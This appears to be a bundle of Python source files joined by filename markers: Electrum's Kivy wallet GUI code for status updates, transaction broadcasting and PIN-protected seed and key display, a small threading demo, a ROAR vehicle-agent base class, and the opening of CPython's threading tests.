tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
    """Translate a network callback into the matching debounced UI triggers.

    Unknown events are logged and otherwise ignored, matching the original
    if/elif chain that had no final else.
    """
    Logger.info('network event: ' + event)
    dispatch = {
        'network_updated': ('_trigger_update_interfaces', '_trigger_update_status'),
        'wallet_updated': ('_trigger_update_wallet', '_trigger_update_status'),
        # blockchain updates change the confirmation counts shown in history
        'blockchain_updated': ('_trigger_update_wallet',),
        'status': ('_trigger_update_status',),
        'new_transaction': ('_trigger_update_wallet',),
        'verified': ('_trigger_update_wallet',),
    }
    for trigger_name in dispatch.get(event, ()):
        getattr(self, trigger_name)()
@profiler
def load_wallet(self, wallet):
    """Swap the GUI over to *wallet*.

    Stops any previously open wallet, refreshes status/tabs, notifies
    plugins via the 'load_wallet' hook, and surfaces (and reports) any
    detected internal-address corruption.
    """
    if self.wallet:
        self.stop_wallet()
    self.wallet = wallet
    self.wallet_name = wallet.basename()
    self.update_wallet()
    # Once GUI has been initialized check if we want to announce something
    # since the callback has been called before the GUI was initialized
    if self.receive_screen:
        self.receive_screen.clear()
        self.update_tabs()
    run_hook('load_wallet', wallet, self)
    try:
        wallet.try_detecting_internal_addresses_corruption()
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        send_exception_to_crash_reporter(e)
def update_status(self, *dt):
    """Refresh the header's balance / connection status text.

    Scheduled via a Clock trigger; *dt* absorbs the scheduling timestamp.
    When a status string applies (offline / syncing / lagging) it replaces
    both balance labels; otherwise the actual balance is formatted.
    """
    if not self.wallet:
        return
    if self.network is None or not self.network.is_connected():
        status = _("Offline")
    elif self.network.is_connected():
        self.num_blocks = self.network.get_local_height()
        server_height = self.network.get_server_height()
        server_lag = self.num_blocks - server_height
        # server_height == 0 means no usable server info yet
        if not self.wallet.up_to_date or server_height == 0:
            status = _("Synchronizing...")
        elif server_lag > 1:
            status = _("Server lagging")
        else:
            status = ''
    else:
        # defensive: unreachable given the two branches above, kept as-is
        status = _("Disconnected")
    if status:
        self.balance = status
        self.fiat_balance = status
    else:
        # confirmed, unconfirmed, unmatured
        c, u, x = self.wallet.get_balance()
        text = self.format_amount(c+x+u)
        self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
        self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
    """Return the maximum spendable amount as a formatted string, '' on failure.

    Builds a throwaway '!' (spend-max) transaction so fees — including any
    plugin-added extra fee — are accounted for.
    """
    from electrum.transaction import TxOutput
    if run_hook('abort_send', self):
        return ''
    inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
    if not inputs:
        return ''
    # NOTE(review): str(None) is the truthy string 'None', so only an empty
    # address string actually falls back to dummy_address() — confirm intended.
    addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
    outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
    try:
        tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
    except NoDynamicFeeEstimates as e:
        # show the error from the UI thread
        Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
        return ''
    except NotEnoughFunds:
        return ''
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        send_exception_to_crash_reporter(e)
        return ''
    amount = tx.output_value()
    # plugins (via the hook) may levy an additional fee on top of the tx fee
    __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
    amount_after_all_fees = amount - x_fee_amount
    return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
    """Show a desktop/mobile notification for *message* via plyer.

    plyer is imported lazily and cached in the module-level `notification`
    global; a missing plyer is logged, never raised.
    """
    try:
        global notification, os
        if not notification:
            from plyer import notification
        # resolve the icon path relative to this module's location
        icon = (os.path.dirname(os.path.realpath(__file__))
                + '/../../' + self.icon)
        notification.notify('Electrum', message,
                            app_icon=icon, app_name='Electrum')
    except ImportError:
        # BUG FIX: kivy's Logger exposes lowercase level methods; `Logger.Error`
        # raised AttributeError here and masked the original ImportError.
        Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
                     arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
    '''Method to show an Information Bubble

    .. parameters::
        text: Message to be displayed; the sentinel value 'texture' makes
              `icon` be treated as a texture shown full screen
        pos: position for the bubble
        duration: duration the bubble remains on screen. 0 = click to hide
        width: width of the Bubble
        arrow_pos: arrow position for the bubble; falsy hides the arrow
    '''
    info_bubble = self.info_bubble
    if not info_bubble:
        # lazily create one reusable bubble widget for the whole app
        info_bubble = self.info_bubble = Factory.InfoBubble()

    win = Window
    if info_bubble.parent:
        # detach from the previous display; when modal, the modal wrapper
        # (not the bubble itself) is the widget attached to the Window
        win.remove_widget(info_bubble
                          if not info_bubble.modal else
                          info_bubble._modal_view)

    if not arrow_pos:
        info_bubble.show_arrow = False
    else:
        info_bubble.show_arrow = True
        info_bubble.arrow_pos = arrow_pos

    img = info_bubble.ids.img
    if text == 'texture':
        # icon holds a texture not a source image
        # display the texture in full screen
        text = ''
        img.texture = icon
        info_bubble.fs = True
        info_bubble.show_arrow = False
        img.allow_stretch = True
        info_bubble.dim_background = True
        info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
    else:
        info_bubble.fs = False
        info_bubble.icon = icon
        #if img.texture and img._coreimage:
        #    img.reload()
        img.allow_stretch = False
        info_bubble.dim_background = False
        info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'

    info_bubble.message = text
    if not pos:
        # default: horizontally centred, nudged up by half the bubble height
        pos = (win.center[0], win.center[1] - (info_bubble.height/2))
    info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
    """Broadcast *tx* on the network thread; report back via *on_complete*.

    *on_complete(status, msg)* is scheduled onto the Kivy main thread:
    status True with the txid on success, False with an error string
    for the two anticipated failure types.
    """
    status = False
    try:
        self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
    except TxBroadcastError as e:
        # server-provided reason already suitable for display
        msg = e.get_message_for_gui()
    except BestEffortRequestFailed as e:
        msg = repr(e)
    else:
        status, msg = True, tx.txid()
    Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
    """Broadcast a signed transaction from a background thread.

    *pr* is an optional payment request to mark as paid once the
    transaction is accepted. Refuses immediately when not connected.
    """
    def on_complete(ok, msg):
        # runs on the Kivy main thread (scheduled by _broadcast_thread)
        if ok:
            self.show_info(_('Payment sent.'))
            if self.send_screen:
                self.send_screen.do_clear()
            if pr:
                self.wallet.invoices.set_paid(pr, tx.txid())
                self.wallet.invoices.save()
                self.update_tab('invoices')
        else:
            msg = msg or ''
            self.show_error(msg)

    if self.network and self.network.is_connected():
        self.show_info(_('Sending'))
        # the actual network call must not block the UI thread
        threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
    else:
        self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
    """Invoke *f(*args, password)* behind a PIN prompt when one is set.

    Without a wallet password, *f* runs immediately with None appended as
    the password. With one, the PIN dialog is shown and *f* runs only on
    success; cancellation is a silent no-op.
    """
    if not self.wallet.has_password():
        f(*(args + (None,)))
        return

    def on_success(pw):
        f(*(args + (pw,)))

    self.password_dialog(self.wallet, msg, on_success, lambda: None)
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
    """Verify the PIN and permanently delete the current wallet file.

    On success: stops the wallet, unlinks its file, announces the removal,
    and loads the (new) default wallet. *pw* may be None for wallets
    without a password.
    """
    wallet_path = self.get_wallet_path()
    basename = os.path.basename(wallet_path)
    if self.wallet.has_password():
        try:
            self.wallet.check_password(pw)
        except Exception:
            # was a bare `except:` which also swallowed SystemExit and
            # KeyboardInterrupt; narrowed to Exception
            self.show_error("Invalid PIN")
            return
    self.stop_wallet()
    os.unlink(wallet_path)
    # show_error is used here only as a message bubble, matching original behaviour
    self.show_error(_("Wallet removed: {}").format(basename))
    new_path = self.electrum_config.get_wallet_path()
    self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
    """Decrypt the wallet seed and display it (plus any passphrase) in *label*.

    *password* is None when the PIN prompt was cancelled for a
    password-protected wallet; in that case nothing is shown.
    """
    if self.wallet.has_password() and password is None:
        return
    keystore = self.wallet.keystore
    try:
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
    except Exception:
        # was a bare `except:`; narrowed so SystemExit/KeyboardInterrupt propagate
        self.show_error("Invalid PIN")
        return
    label.text = _('Seed') + ':\n' + seed
    if passphrase:
        label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
    """Open the PIN-change dialog.

    Note: *cb* is not used anywhere in this body — presumably kept for
    API compatibility with callers; verify before removing.
    """
    from .uix.dialogs.password_dialog import PasswordDialog
    if self._password_dialog is None:
        # single dialog instance reused across invocations
        self._password_dialog = PasswordDialog()
    message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
    def on_success(old_password, new_password):
        self.wallet.update_password(old_password, new_password)
        self.show_info(_("Your PIN code was updated"))
    on_failure = lambda: self.show_error(_("PIN codes do not match"))
    self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
    self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
    """Decrypt the private key for *addr* behind a PIN prompt and put it
    into *pk_label.data*. Refuses for watching-only wallets.
    """
    if self.wallet.is_watching_only():
        self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
        return
    def show_private_key(addr, pk_label, password):
        # password is None when the PIN prompt was cancelled
        if self.wallet.has_password() and password is None:
            return
        if not self.wallet.can_export():
            return
        try:
            key = str(self.wallet.export_private_key(addr, password)[0])
            pk_label.data = key
        except InvalidPassword:
            self.show_error("Invalid PIN")
            return
    self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
mtprint4.py | import threading
class MyClass:
    """Callable object usable as a Thread target; prints a greeting with its args."""

    def __call__(self, a, b, c):
        print('Hello', a, b, c)


if __name__ == '__main__':
    # Thread invokes target(*args); an instance with __call__ works as a target.
    for _run in range(3):
        worker = threading.Thread(target=MyClass(), args=(10, 20, 30))
        worker.start()
|
agent.py | from abc import ABC, abstractmethod
import logging
from ROAR.utilities_module.vehicle_models import Vehicle
from ROAR.utilities_module.data_structures_models import SensorsData, IMUData, Transform
from ROAR.utilities_module.vehicle_models import VehicleControl
from typing import Optional, List
from pathlib import Path
import cv2
import numpy as np
from ROAR.utilities_module.module import Module
from ROAR.configurations.configuration import Configuration as AgentConfig
from ROAR.planning_module.local_planner.local_planner import LocalPlanner
from ROAR.planning_module.behavior_planner.behavior_planner import BehaviorPlanner
from ROAR.planning_module.mission_planner.mission_planner import MissionPlanner
import threading
from typing import Dict, Any
from datetime import datetime
class Agent(ABC):
    """
    Abstract Agent class that define the minimum of a ROAR agent.

    Inherited agent can perform different duties.
    """

    def __init__(self, vehicle: Vehicle, agent_settings: AgentConfig, imu: Optional[IMUData] = None,
                 should_init_default_cam=True, **kwargs):
        """
        Initialize cameras, output folder, and logging utilities

        Args:
            vehicle: Vehicle instance
            agent_settings: User specified settings for Agent
            imu: IMU data (will be deprecated to be passed in like this)
            should_init_default_cam: whether to compute default camera intrinsics
            **kwargs: additional info, exposed to subclasses via self.kwargs
        """
        self.logger = logging.getLogger(__name__)
        self.vehicle = vehicle
        self.agent_settings = agent_settings
        self.front_rgb_camera = agent_settings.front_rgb_cam
        self.front_depth_camera = agent_settings.front_depth_cam
        self.rear_rgb_camera = agent_settings.rear_rgb_cam
        self.imu = imu
        self.is_done = False

        # per-sensor output folders
        self.output_folder_path = \
            Path(self.agent_settings.output_data_folder_path)
        self.front_depth_camera_output_folder_path = \
            self.output_folder_path / "front_depth"
        self.front_rgb_camera_output_folder_path = \
            self.output_folder_path / "front_rgb"
        self.rear_rgb_camera_output_folder_path = \
            self.output_folder_path / "rear_rgb"
        self.should_save_sensor_data = self.agent_settings.save_sensor_data
        self.transform_output_folder_path = self.output_folder_path / "transform"

        self.local_planner: Optional[LocalPlanner] = None
        self.behavior_planner: Optional[BehaviorPlanner] = None
        self.mission_planner: Optional[MissionPlanner] = None

        self.threaded_modules: List[Module] = []
        self.time_counter = 0
        self.transform_history: List[Transform] = []

        if should_init_default_cam:
            self.init_cam()

        if self.should_save_sensor_data:
            # create all output folders up front so saving never hits a missing dir
            for folder in (self.front_depth_camera_output_folder_path,
                           self.front_rgb_camera_output_folder_path,
                           self.rear_rgb_camera_output_folder_path,
                           self.transform_output_folder_path):
                folder.mkdir(parents=True, exist_ok=True)

        self.kwargs: Dict[str, Any] = kwargs  # additional info

    def add_threaded_module(self, module: Module):
        """Register *module* to be spawned by start_module_threads.

        Raises:
            threading.ThreadError: if the module is not marked as threaded.
        """
        if module.threaded:
            self.threaded_modules.append(module)
        else:
            msg = f"Module {module} is not registered as threaded, but is attempting to run threaded"
            self.logger.error(msg)
            raise threading.ThreadError(msg)

    def init_cam(self) -> None:
        """
        Initialize the cameras by calculating the camera intrinsics and
        ensuring that the output folder path exists

        Returns:
            None
        """
        # identical per-camera logic, de-duplicated into one loop
        for camera in (self.front_rgb_camera, self.front_depth_camera, self.rear_rgb_camera):
            if camera is not None:
                camera.intrinsics_matrix = camera.calculate_default_intrinsics_matrix()

    @abstractmethod
    def run_step(self, sensors_data: SensorsData,
                 vehicle: Vehicle) -> VehicleControl:
        """
        Receive Sensor Data and vehicle state information on every step and
        return a control

        Args:
            sensors_data: sensor data on this frame
            vehicle: vehicle state on this frame

        Returns:
            Vehicle Control
        """
        self.time_counter += 1
        self.sync_data(sensors_data=sensors_data, vehicle=vehicle)
        if self.should_save_sensor_data:
            self.save_sensor_data()
        if self.local_planner is not None and self.local_planner.is_done():
            self.is_done = True
        return VehicleControl()

    def sync_data(self, sensors_data: SensorsData, vehicle: Vehicle) -> None:
        """
        Sync agent's state by updating Sensor Data and vehicle information

        Args:
            sensors_data: the new frame's sensor data
            vehicle: the new frame's vehicle state

        Returns:
            None
        """
        self.vehicle = vehicle
        self.transform_history.append(self.vehicle.transform)
        if self.front_rgb_camera is not None:
            self.front_rgb_camera.data = (
                sensors_data.front_rgb.data
                if sensors_data.front_rgb is not None
                else None
            )
        if self.front_depth_camera is not None:
            self.front_depth_camera.data = (
                sensors_data.front_depth.data
                if sensors_data.front_depth is not None
                else None
            )
        if self.rear_rgb_camera is not None:
            self.rear_rgb_camera.data = (
                sensors_data.rear_rgb.data
                if sensors_data.rear_rgb is not None
                else None
            )
        if self.imu is not None:
            self.imu = sensors_data.imu_data

    def save_sensor_data(self) -> None:
        """
        Failure-safe saving function that saves all the sensor data of the
        current frame

        Returns:
            None
        """
        now = datetime.now().strftime('%m_%d_%Y_%H_%M_%S')
        try:
            if self.front_rgb_camera is not None and self.front_rgb_camera.data is not None:
                cv2.imwrite((self.front_rgb_camera_output_folder_path /
                             f"frame_{now}.png").as_posix(),
                            self.front_rgb_camera.data)
        except Exception as e:
            self.logger.error(
                f"Failed to save at Frame {self.time_counter}. Error: {e}")
        try:
            # BUG FIX: this branch saves depth data but was guarded on the
            # RGB camera; check the depth camera (and its data) instead
            if self.front_depth_camera is not None and self.front_depth_camera.data is not None:
                np.save((self.front_depth_camera_output_folder_path /
                         f"frame_{now}").as_posix(),
                        self.front_depth_camera.data)
        except Exception as e:
            self.logger.error(
                f"Failed to save at Frame {self.time_counter}. Error: {e}")
        try:
            if self.rear_rgb_camera is not None and self.rear_rgb_camera.data is not None:
                cv2.imwrite((self.rear_rgb_camera_output_folder_path /
                             f"frame_{now}.png").as_posix(),
                            self.rear_rgb_camera.data)
        except Exception as e:
            self.logger.error(
                f"Failed to save at Frame {self.time_counter}. Error: {e}")
        try:
            # context manager closes the file even if write() raises
            with (Path(self.transform_output_folder_path) /
                  f"frame_{now}.txt").open('w') as transform_file:
                transform_file.write(self.vehicle.transform.record())
        except Exception as e:
            self.logger.error(
                f"Failed to save at Frame {self.time_counter}. Error: {e}")

    def start_module_threads(self):
        """Spawn a daemon thread for every registered threaded module."""
        for module in self.threaded_modules:
            threading.Thread(target=module.run_in_threaded, daemon=True).start()
            self.logger.debug(f"{module.__class__.__name__} thread started")

    def shutdown_module_threads(self):
        """Ask every registered threaded module to shut down."""
        for module in self.threaded_modules:
            module.shutdown()
|
test_threading.py | """
Tests for the threading module.
"""
import test.support
from test.support import threading_helper
from test.support import verbose, cpython_only
from test.support.import_helper import import_module
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from unittest import mock
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
    """A trivial mutable integer counter (callers provide their own locking)."""

    def __init__(self):
        self.value = 0

    def _add(self, delta):
        # single mutation point shared by inc/dec
        self.value += delta

    def inc(self):
        """Increase the count by one."""
        self._add(1)

    def dec(self):
        """Decrease the count by one."""
        self._add(-1)

    def get(self):
        """Return the current count."""
        return self.value
class TestThread(threading.Thread):
    """Worker used by ThreadTests.test_various_ops.

    Runs for a tiny random delay while holding *sema*, tracking the number
    of concurrently running tasks in the shared *nrunning* counter (guarded
    by *mutex*) so the test case can assert the semaphore's concurrency bound.
    """

    def __init__(self, name, testcase, sema, mutex, nrunning):
        threading.Thread.__init__(self, name=name)
        self.testcase = testcase
        self.sema = sema
        self.mutex = mutex
        self.nrunning = nrunning

    def run(self):
        delay = random.random() / 10000.0
        if verbose:
            print('task %s will run for %.1f usec' %
                  (self.name, delay * 1e6))

        with self.sema:
            with self.mutex:
                self.nrunning.inc()
                if verbose:
                    print(self.nrunning.get(), 'tasks are running')
                # the bounded semaphore must cap concurrency at 3
                self.testcase.assertLessEqual(self.nrunning.get(), 3)

            time.sleep(delay)
            if verbose:
                print('task', self.name, 'done')

            with self.mutex:
                self.nrunning.dec()
                # the running count can never go negative
                self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
                if verbose:
                    print('%s is finished. %d tasks are running' %
                          (self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
    """Base case that snapshots live threads before each test and verifies
    they were all cleaned up (and children reaped) afterwards."""

    def setUp(self):
        # remember the threads alive before the test runs
        self._threads = threading_helper.threading_setup()

    def tearDown(self):
        # fail if the test leaked threads relative to the snapshot
        threading_helper.threading_cleanup(*self._threads)
        test.support.reap_children()
class ThreadTests(BaseTestCase):
@cpython_only
def test_name(self):
def func(): pass
thread = threading.Thread(name="myname1")
self.assertEqual(thread.name, "myname1")
# Convert int name to str
thread = threading.Thread(name=123)
self.assertEqual(thread.name, "123")
# target name is ignored if name is specified
thread = threading.Thread(target=func, name="myname2")
self.assertEqual(thread.name, "myname2")
with mock.patch.object(threading, '_counter', return_value=2):
thread = threading.Thread(name="")
self.assertEqual(thread.name, "Thread-2")
with mock.patch.object(threading, '_counter', return_value=3):
thread = threading.Thread()
self.assertEqual(thread.name, "Thread-3")
with mock.patch.object(threading, '_counter', return_value=5):
thread = threading.Thread(target=func)
self.assertEqual(thread.name, "Thread-5 (func)")
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
